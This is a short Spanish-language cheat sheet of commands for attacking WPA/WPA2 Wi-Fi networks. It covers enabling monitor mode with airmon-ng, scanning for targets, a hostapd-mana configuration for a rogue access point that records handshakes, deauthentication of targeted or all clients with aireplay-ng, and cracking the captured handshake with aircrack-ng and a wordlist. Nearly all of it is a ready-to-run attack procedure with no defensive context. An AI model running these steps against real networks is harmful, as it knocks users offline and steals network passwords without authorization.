Habilitar modo monitor en tarjeta inalámbrica.
sudo airmon-ng check kill && sudo airmon-ng start <interface> && iw dev <interface-mon> info
sudo airmon-ng check kill && sudo airmon-ng start wlan0 && iw dev wlan0mon info
Captura de paquetes para identificar el BSSID, ESSID y canal objetivo.
sudo airodump-ng <interface-mon>
Deshabilitar modo monitor en tarjeta inalámbrica.
sudo airmon-ng stop <interface-mon> && iw dev <interface> info
sudo airmon-ng stop wlan0mon && iw dev wlan0 info
Creación de archivo de configuración de hostapd-mana.
interface=<interface>
ssid=<ssid>
channel=<channel>
hw_mode=g
ieee80211n=1
# WPA=1, WPA2=2, WPA & WPA2=3
wpa=3
wpa_key_mgmt=WPA-PSK
wpa_passphrase=<any-password>
# WPA1
wpa_pairwise=TKIP CCMP
# WPA2
rsn_pairwise=TKIP CCMP
mana_wpaout=/<path>/output.hccapx
Inicio de rogue access points.
sudo hostapd-mana hostapd-mana.conf
Desautenticación de cliente(s).
# Desautenticación dirigida
sudo aireplay-ng <interface-mon-01> -0 0 -a <BSSID> -c <client-mac-address>
# Desautenticación broadcast
sudo aireplay-ng <interface-mon-01> -0 0 -a <BSSID>
Cracking con Aircrack-ng.
aircrack-ng output.hccapx -e <ESSID> -w <path-wordlist>